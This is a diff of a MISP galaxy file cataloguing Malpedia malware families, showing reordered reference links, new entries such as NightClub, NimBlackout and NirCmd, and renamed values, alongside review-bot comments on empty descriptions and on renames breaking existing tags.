"https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", + "https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/", + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" ], "synonyms": [ "NetSupport" @@ -35475,10 +37092,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", - "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/" ], "synonyms": [ "TravNet" 
@@ -35493,57 +37110,58 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "https://news.drweb.ru/show/?i=13281&c=23", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA", - "https://www.youtube.com/watch?v=TeQdZxP0RYY", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", - "https://community.riskiq.com/article/24759ad2", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", - "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", + "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://lmntrix.com/lab/analysis-of-netwire-rat/", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - 
"https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://www.circl.lu/pub/tr-23/", - "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", + "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "https://lmntrix.com/lab/analysis-of-netwire-rat/", + "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", + "https://community.riskiq.com/article/24759ad2", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", + "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", + "https://www.circl.lu/pub/tr-23/", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + 
"https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", + "https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.youtube.com/watch?v=TeQdZxP0RYY", + "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", + "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", 
"https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://www.theregister.com/2023/03/10/fbi_netwire_seizure/", - "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", - "https://threatpost.com/ta2541-apt-rats-aviation/178422/", - "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", - "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", - "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", - "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", - "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view", - "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", - "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", - "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", - 
"https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", - "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://news.drweb.ru/show/?i=13281&c=23", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" ], "synonyms": [ "NetWeird", @@ -35560,9 +37178,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.ncsc.gov.uk/alerts/turla-group-malware", - "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims" + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://www.secureworks.com/research/threat-profiles/iron-hunter" ], "synonyms": [], "type": [] 
@@ -35575,19 +37193,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", - "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", - "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", - "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", - "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", + "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "http://blog.ptsecurity.com/2019/08/finding-neutrino.html", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22", - "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html", - "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", - "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + 
"https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", + "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", + "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/" ], "synonyms": [ "Kasidet" @@ -35628,13 +37246,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", - "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html", - "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6" + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6", + "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html" ], "synonyms": [], "type": [] 
@@ -35660,9 +37278,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/" ], "synonyms": [], "type": [] @@ -35688,9 +37306,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", + "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ 
@@ -35745,12 +37363,12 @@ "value": "Ngioweb (Windows)" }, { - "description": "", + "description": "According to Unit42, NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nglite", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", - "https://us-cert.cisa.gov/ncas/alerts/aa21-336a" + "https://us-cert.cisa.gov/ncas/alerts/aa21-336a", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" ], "synonyms": [], "type": [] 
@@ -35771,16 +37389,30 @@ "uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25", "value": "Nibiru" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub", + "https://i.blackhat.com/BH-US-23/Presentations/US-23-MatthieuFaou-MoustachedBouncer.pdf", + "https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7b9747fa-291a-497b-ae0a-b0760b2b62e5", + "value": "NightClub" + }, { "description": "C2 framework.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk", "https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py", "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice", - "https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html" + "https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py" ], "synonyms": [], "type": [] 
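Review bot: The new NightClub entry ships with `"description": ""` even though its two non-Malpedia references (the ESET MoustachedBouncer write-up and the Black Hat USA 2023 slides) would support a one-sentence summary, as was done for NGLite in the previous hunk. An empty string is indistinguishable from "no description yet" for consumers that render the field, and the file elsewhere uses the same placeholder, so this is likely mirrored from the upstream source. If the generator copies Malpedia's description verbatim, the text should be contributed upstream rather than hand-edited here, otherwise the next regeneration will revert it.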
@@ -35793,14 +37425,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://twitter.com/cglyer/status/1480742363991580674", "https://twitter.com/cglyer/status/1480734487000453121", - "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation", - "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/", - "https://www.youtube.com/watch?v=Yzt_zOO8pDM", "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://www.youtube.com/watch?v=Yzt_zOO8pDM", + "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://twitter.com/cglyer/status/1480742363991580674" ], "synonyms": [ "Night Sky" 
@@ -35825,7 +37457,7 @@ "value": "NimbleMamba " }, { - "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 only. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).", + "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2", @@ -35835,7 +37467,7 @@ "type": [] }, "uuid": "bda7efa0-e08d-453e-95d4-9307c5104a69", - "value": "Nimbo-C2" + "value": "Nimbo-C2 (Windows)" }, { "description": "Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.", 
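Review bot: Renaming `value` from `"Nimbo-C2"` to `"Nimbo-C2 (Windows)"` changes the string MISP builds galaxy tags from (`misp-galaxy:<galaxy-name>="Nimbo-C2"`), so events already tagged with the old value will no longer resolve to this cluster even though the uuid `bda7efa0-e08d-453e-95d4-9307c5104a69` is unchanged; adding `"Nimbo-C2"` to the entry's `synonyms` (not shown in this hunk) keeps the old name discoverable. The same applies to the `"win.nitro"` → `"Nitro"` rename in the win.nitro hunk below, although there the old value is plainly a Malpedia identifier rather than a family name and the correction is right. Separately, the updated description now says the agent supports "Windows x64 and Linux" while the value is scoped to Windows; presumably a separate ELF entry exists, and a short cross-reference in the description would stop readers taking this entry as covering the Linux agent as well.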
@@ -35863,6 +37495,32 @@ "uuid": "69981781-962a-409a-93c6-cb5377257de8", "value": "Nimrev" }, + { + "description": "According to its author, NimBlackout is an adaptation of the @Blackout project originally developed in C++ by @ZeroMemoryEx, which consists of removing AV/EDRs using the gmer (BYOVD) driver. The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout", + "https://github.com/Helixo32/NimBlackout" + ], + "synonyms": [], + "type": [] + }, + "uuid": "904152c4-7483-41e7-acbb-884a7b32bce4", + "value": "NimBlackout" + }, + { + "description": "NirCmd is a benign tool by NirSoft that provides various functionalities. Among these is e.g. a capability to start regedit as SYSTEM, which is sometimes abused for privilege escalation, or other functionality abusable for other malicious purposes. It is also frequently flagged by AV engines.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nircmd", + "https://www.nirsoft.net/utils/nircmd.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51047f06-d824-4b84-a69c-97808b18f6bf", + "value": "NirCmd" + }, { "description": "", "meta": { @@ -35881,10 +37539,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", - "https://en.wikipedia.org/wiki/Nitol_botnet", - "https://krebsonsecurity.com/tag/nitol/", "https://asec.ahnlab.com/en/44504/", - "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/" + "https://krebsonsecurity.com/tag/nitol/", + "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/", + "https://en.wikipedia.org/wiki/Nitol_botnet" ], "synonyms": [], "type": [] 
@@ -35898,9 +37556,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro", "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf", + "https://twitter.com/malwrhunterteam/status/1430616882231578624", "https://github.com/nightfallgt/nitro-ransomware", - "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/", - "https://twitter.com/malwrhunterteam/status/1430616882231578624" + "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/" ], "synonyms": [ "Hydra" @@ -35908,7 +37566,7 @@ "type": [] }, "uuid": "a81635fc-7bb7-4cd1-b26c-ea8ce6cb2763", - "value": "win.nitro" + "value": "Nitro" }, { "description": "A Turkish cryptominer campaign.", 
@@ -35941,74 +37599,75 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", - "https://attack.mitre.org/groups/G0096", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", - "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", - "https://twitter.com/ESETresearch/status/1449132020613922828", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://blogs.360.cn/post/APT-C-44.html", - "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", - "https://intel471.com/blog/privateloader-malware", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", - "https://blog.reversinglabs.com/blog/rats-in-the-library", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", - "https://forensicitguy.github.io/njrat-installed-from-msi/", - "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", - 
"https://labs.k7computing.com/?p=21904", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", - "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", - "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", - "https://blog.morphisec.com/syk-crypter-discord", - "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", - "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://www.4hou.com/posts/VoPM", - 
"https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
- "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
- "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
- "https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/",
- "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
- "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://asec.ahnlab.com/1369",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
- "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
 "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
- "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/",
 "https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT",
+ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
+ "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/",
 "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
